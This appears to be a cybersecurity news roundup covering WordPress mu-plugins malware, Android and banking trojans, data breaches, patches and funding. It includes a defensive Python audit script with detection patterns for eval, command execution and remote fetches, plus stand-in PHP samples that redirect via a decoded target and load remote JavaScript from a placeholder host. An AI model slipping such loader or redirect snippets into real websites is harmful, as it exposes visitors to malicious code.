Threat Actors Deploy WordPress Malware in ‘mu-plugins’ Directory
Sneaky hackers are targeting WordPress sites by stashing malware in the lesser-known ‘mu-plugins’ directory, a clever move to dodge standard security sweeps, warns Sucuri. Must-Use (MU) plugins auto-run on every page load, don’t need activation, and stay hidden from the usual plugin dashboard—making them a hacker’s dream hideout. Sucuri first spotted this trick in February with dodgy files like index.php and test-mu-plugin.php dropping backdoors. Now, they’ve uncovered more nasties—redirect.php, index.php, and custom-js-loader.php—that redirect users to malicious sites, spawn web shells for remote control, and inject spam. These files blend in by mimicking legit WordPress functions, but odd site behavior or unexplained server spikes are red flags. The redirect.php script even tailors its attack—serving fake browser updates to trick users into running code that steals data or plants more malware. Index.php fetches remote payloads, while custom-js-loader.php hijacks clicks with malicious popups. Sucuri suspects vulnerable plugins, weak credentials, or lax file permissions are entry points. WordPress admins, time to double-check that mu-plugins folder!
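As an added defender-side example (not code from Sucuri or from WordPress itself), the following Python audit walks a wp-content/mu-plugins directory, lists every PHP file it finds, and flags the filenames named above plus a few constructs a legitimate must-use plugin rarely needs. The sample files it audits are constructed stand-ins written to a temporary directory, not real malware, and the pattern list is a starting heuristic, not a complete signature set.

```python
import os
import re
import tempfile

# Filenames Sucuri reported in compromised mu-plugins directories.
REPORTED_NAMES = {"index.php", "test-mu-plugin.php", "redirect.php", "custom-js-loader.php"}

# Constructs a legitimate must-use plugin rarely needs; each hit adds a flag.
SUSPICIOUS_PATTERNS = {
    "dynamic-eval": re.compile(r"\b(eval|assert|create_function)\s*\(", re.I),
    "encoded-payload": re.compile(r"\b(base64_decode|gzinflate|str_rot13)\s*\(", re.I),
    "remote-fetch": re.compile(r"\b(file_get_contents|curl_exec|wp_remote_get)\s*\(", re.I),
    "redirect": re.compile(r"\bheader\s*\(\s*['\"]Location:", re.I),
    "command-exec": re.compile(r"\b(system|exec|shell_exec|passthru)\s*\(", re.I),
}

def audit_mu_plugins(mu_dir):
    """Return {relative_path: [flags]} for every .php file under mu_dir."""
    # Every file is listed, flagged or not: anything here auto-loads on each
    # request without activation and is hidden from the plugin dashboard.
    findings = {}
    for root, _dirs, files in os.walk(mu_dir):
        for name in sorted(files):
            if not name.lower().endswith(".php"):
                continue
            path = os.path.join(root, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                src = fh.read()
            flags = ["reported-name"] if name.lower() in REPORTED_NAMES else []
            flags += [label for label, pat in SUSPICIOUS_PATTERNS.items() if pat.search(src)]
            findings[os.path.relpath(path, mu_dir)] = flags
    return findings

def demo():
    """Audit a constructed mu-plugins tree (stand-in files, not real malware)."""
    mu_dir = tempfile.mkdtemp(prefix="mu-plugins-")
    samples = {
        "site-tweaks.php": "<?php add_filter('show_admin_bar', '__return_false');",
        "redirect.php": "<?php header('Location: ' . base64_decode($target));",
        "custom-js-loader.php": "<?php echo file_get_contents('https://example.invalid/x.js');",
    }
    for name, body in samples.items():
        with open(os.path.join(mu_dir, name), "w", encoding="utf-8") as fh:
            fh.write(body)
    return audit_mu_plugins(mu_dir)

if __name__ == "__main__":
    for rel, flags in demo().items():
        print(f"{rel}: {', '.join(flags) or 'no flags'}")
```

Point `audit_mu_plugins()` at a real site's mu-plugins path and treat any file you did not place there as worth inspecting, whether or not it picks up a flag.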
Zero to Hero – A “Measured” Approach to Building a World-Class Offensive Security Program
Want a top-tier offensive security program? Measure twice, cut once, says this deep dive into building resilience that lasts. Jumping straight to penetration tests or Red Teaming is tempting, but without a solid foundation, results won’t stick. This piece lays out a maturity “calculus” in three stages: Foundational (threat modeling, vuln management), Advanced (pen testing networks and apps), and Adversary Emulation (Red and Purple Teaming). Progress hinges on assessing coverage, cadence, and who’s running the show—do you have the people, processes, and tech to sustain it? Think OWASP SAMM frameworks and regular testing to keep pace with evolving threats. Start with threat modeling and attack surface visibility, then layer in vuln scans and pen tests, and finally flex your chops with full-on adversary sims. It’s not cheap—maturity demands cultural shifts and budget—but the payoff is a program that doesn’t just pass a test, it thrives under pressure. Missteps here aren’t as obvious as a botched construction cut; they could lurk undetected until a breach hits.
Hacker Leaks Samsung Customer Data
A hacker dubbed ‘GHNA’ just dumped 270,000 customer records allegedly swiped from Samsung Germany’s ticketing system, reports Hudson Rock. The breach traces back to stolen credentials from Spectos GmbH, a service quality firm, nabbed via a 2021 Raccoon infostealer hit. Those creds sat dormant for years until this year, when GHNA used them to raid Samsung’s system, exposing names, addresses, emails, order details, and support chats. Hudson Rock warns this haul could fuel phishing, fraud, or even porch piracy. AI could supercharge the damage, crafting pinpoint phishing lures or fake support calls. Samsung’s yet to comment, but Hudson Rock pins the blame on sloppy credential hygiene—a recurring headache seen in breaches at Jaguar Land Rover and others. Infostealers are a ticking time bomb, and companies can’t just patch and hope; proactive credential hunting’s a must. For now, Samsung customers might want to keep an eye on their inboxes—and their front porches.
Part of EU’s New €1.3 Billion Investment Going to Cybersecurity
The European Commission just dropped a €1.3 billion ($1.4B) bombshell under its Digital Europe Programme for 2025-2027, and cybersecurity’s getting a juicy slice. Aimed at turbocharging digital tech across the EU, the funds will bolster cyber resilience—think EU Cybersecurity Reserve shielding hospitals and submarine cables from attacks. Cash will also flow into the Digital Identity Wallet rollout, promising tighter data protection and fraud busting. Beyond security, the investment’s juicing up gen-AI apps, digital innovation hubs, and skills training. This comes hot on the heels of EU sanctions against Russian and North Korean hackers targeting Estonia and aiding Ukraine’s war effort. The message? Europe’s doubling down on digital defenses as cyber threats loom larger. With critical infra in the crosshairs, this cash infusion could be a game-changer—if spent right.
‘Crocodilus’ Android Banking Trojan Allows Device Takeover, Data Theft
Meet Crocodilus, the latest Android banking trojan giving fraud fighters at ThreatFabric nightmares. This beast packs remote control, keylogging, overlay attacks, and data harvesting, targeting users in Spain and Turkey. Dropped via a crafty app that sidesteps Android 13+ restrictions, it grabs Accessibility Services to seize control. Once in, it phones home to its C&C server for app targets and overlays, silently snagging creds while logging every tap. It even snipes Google Authenticator OTPs and, with remote access, can pull off fraudulent transactions. Crypto wallets? It tricks users into coughing up keys with fake backup prompts. Sneaky extras like black screen overlays and muted audio keep victims clueless. ThreatFabric ties it to a ‘sybra’ actor linked to Ermac and Octo malware, hinting at a Turkish dev behind the debug code. Android users, watch what you install!
CISA Analyzes Malware Used in Ivanti Zero-Day Attacks
CISA’s latest report unpacks the malware Chinese hackers wielded against an Ivanti Connect Secure zero-day (CVE-2025-0282), patched in January 2025. This nasty stack-based buffer overflow (CVSS 9.0) let attackers run code remotely, no login needed. Mandiant pegged exploitation to December 2024 by UNC5221, a China-linked espionage crew, dropping Spawn family malware—SpawnAnt, SpawnMole, and SpawnSnail. JPCERT/CC later spotted SpawnChimera, an evolved variant. CISA’s sample, dubbed Resurge, landed as ‘libdsupgrade.so’—a rootkit, dropper, backdoor, and more—hooking processes, setting up web shells, and tweaking logs with SpawnSloth. A third file, ‘dsmain’, leaned on BusyBox to fetch payloads. Ivanti users, patch up—this one’s a doozy.
170,000 Impacted by Data Breach at Chord Specialty Dental Partners
Chord Specialty Dental Partners, a Tennessee dental service outfit, just copped to a breach hitting over 173,000 people. Suspicious email activity in September 2024 led to the discovery of unauthorized access from August 18 to September 25. Compromised accounts held names, SSNs, medical info, and more. No misuse evidence yet, but Chord’s offering credit monitoring anyway. Reported to HHS, this joins a wave of email-based healthcare breaches—like Numotion’s 500K-hit incident. Dental patients, keep your guard up.
Critical Condition: Legacy Medical Devices Remain Easy Targets for Ransomware
Healthcare’s a ransomware magnet, and Claroty’s Team82 explains why: legacy medical devices are sitting ducks. Analyzing 2.25M IoMT and 647K OT devices across 351 orgs, they found 99% have exploitable flaws from CISA’s KEV list, with 20% tied to ransomware and internet-exposed. Patching’s a nightmare—FDA validation lags, and uptime trumps updates. Team82’s Venn triage (KEVs + ransomware + connectivity) cuts the noise, spotlighting 1,763 OT and 22,500 IoMT devices most at risk. A five-step fix—scope, discover, prioritize, validate, mobilize—offers hope, but healthcare’s attack surface needs urgent TLC.
9-Year-Old NPM Crypto Package Hijacked for Information Theft
Sonatype’s sounding the alarm: NPM packages for blockchain devs, some nine years old, got hijacked to sling info-stealing malware. With 500K lifetime downloads, packages like ‘bnb-javascript-sdk-nobroadcast’ and ‘country-currency-map’ rolled out malicious updates on NPM (GitHub untouched). Obfuscated scripts snag env vars—API keys, SSH creds, you name it. Old maintainer accounts, likely compromised via credential stuffing, are the culprits. NPM’s 2FA push in 2022 missed some, leaving gaps. Devs, check your dependencies!
Morphing Meerkat Phishing Kits Target Over 100 Brands
Infoblox unveils Morphing Meerkat, a PhaaS platform spoofing 114 brands with slick phishing kits. Using DNS MX records, it tailors fake login pages, hitting Gmail, Outlook, and more since 2020. Compromised WordPress sites, adtech redirects, and dynamic translation in 13+ languages make it a global menace. Pros at finance firms are prime targets, with creds harvested via email, PHP, or APIs. Morphing Meerkat’s centralized ops hint at a lone actor—watch those inbox links!
Fresh Grandoreiro Banking Trojan Campaigns Target Latin America, Europe
Grandoreiro’s back, hitting Latin America and Europe with phishing disguised as tax agency warnings, says Forcepoint. Active since 2016, this MaaS trojan’s survived takedowns, now targeting 1,700 banks and 276 crypto wallets globally. Obfuscated VB scripts and Delphi executables, hosted on legit services like Contabo and Mediafire, steal creds and scout Bitcoin dirs. Frequent subdomain swaps keep it slippery—users, skip those shady emails!
Firefox Affected by Flaw Similar to Chrome Zero-Day Exploited in Russia
Mozilla’s scrambling after finding Firefox has a flaw (CVE-2025-2857) mirroring Chrome’s zero-day (CVE-2025-2783), exploited in Russia since March. Kaspersky caught the Chrome bug in Operation ForumTroll, targeting Russian orgs with sandbox escapes. Firefox’s IPC bug, fixed in versions 136.0.4+, hits Windows users. No attacks on Firefox yet, but CISA’s KEV listing flags Chromium risks too. Update now!
Splunk Patches Dozens of Vulnerabilities
Splunk’s latest patch drop fixes heaps of flaws, including two high-severity bugs in Enterprise and Secure Gateway. CVE-2025-20229 (CVSS 8.0) lets low-priv users run code via file uploads, while another exposes tokens in logs. Medium and low issues hit maintenance, data manipulation, and third-party packages. No exploits yet—update to 9.4.1+ pronto!
Russian Espionage Group Using Ransomware in Attacks
RedCurl, a Russian espionage crew since 2018, is flipping the script with QWCrypt ransomware, says Bitdefender. Phishing with IMG-hosted SCR files sideloads DLLs, dropping hypervisor-targeting ransomware to cripple VMs. No extortion yet—just stealthy data theft. A gun-for-hire vibe suggests ransomware’s a decoy or Plan B. Low-profile ops keep them under the radar.
UK Software Firm Fined £3 Million Over Ransomware-Caused Data Breach
UK’s Advanced Computer Software Group got slapped with a £3M ($3.8M) ICO fine after a 2022 LockBit ransomware hit exposed 80K people’s data. No MFA on a customer account let hackers in, compromising NHS-linked home care details. A voluntary settlement, but a wake-up call: basics like MFA matter.
The Importance of Allyship for Women in Cyber
Mentorship boosts retention (72% vs. 49%) and morale (93% men, 83% women), says this piece spotlighting Viasat’s Taylor Pyle. From intern to Cyber Threat Intel lead, Pyle credits male allies like Damon Rouse for her rise. She pushes for early STEM exposure to get more women in tech—diverse leadership drives innovation.
GetReal Security Raises $17.5 Million to Tackle Gen-AI Threats
GetReal Security nabbed $17.5M in Series A cash from Forgepoint and others to fight AI-generated threats like deepfakes. Born from Ballistic Ventures and UC Berkeley’s Hany Farid, its platform verifies media and trains teams. Funds will boost R&D and market push—AI’s risks are spiking, and GetReal’s on it.
Defense Contractor MORSE to Pay $4.6M to Settle Cybersecurity Failure Allegations
MORSE Corp’s coughing up $4.6M to settle False Claims Act allegations over lax cybersecurity on Army and Air Force contracts. A whistleblower flagged NIST gaps and dodgy email security in 2023. No breaches, says MORSE, but the DOJ’s deal signals: secure that sensitive data or pay up.
Ransomware Groups Increasingly Adopting EDR Killer Tools
Ransomware gangs like RansomHub are arming up with EDR killers like EDRKillShifter, says ESET. Post-LockBit and BlackCat, affiliates share tools targeting security software via vulnerable drivers. Play, Medusa, and BianLian attacks hint at a ‘QuadSwitcher’ actor. EDR killers are trending as detection improves—encryptors stay static, but evasion’s evolving.
T-Mobile Coughed Up $33 Million in SIM Swap Lawsuit
T-Mobile’s shelling out $33M after a SIM swap attack drained $38M in crypto from Josh Jones in 2020, says Greenberg Glusker. A teen hacker exploited a backdoor, bypassing Jones’ 8-digit PIN. The sealed ruling raps T-Mobile’s security flops—carriers, tighten up, or face the music.
More Solar System Vulnerabilities Expose Power Grids to Hacking
Forescout’s dug up 46 new flaws in Sungrow, Growatt, and SMA solar gear, adding to 90+ known issues. From RCE to DoS, these bugs could let hackers destabilize grids or steal data. SMA and Sungrow patched; Growatt’s lagging. Solar’s critical—secure it like it matters.
AI Security Firm Straiker Emerges From Stealth With $21M in Funding
Straiker’s out of stealth with $21M from Lightspeed and Bain, tackling AI app risks like data leaks and prompt injections. Its Ascend AI tests threats; Defend AI blocks them. With LLM evasion and chaos in sight, Straiker’s engine customizes protection—AI security’s officially a priority.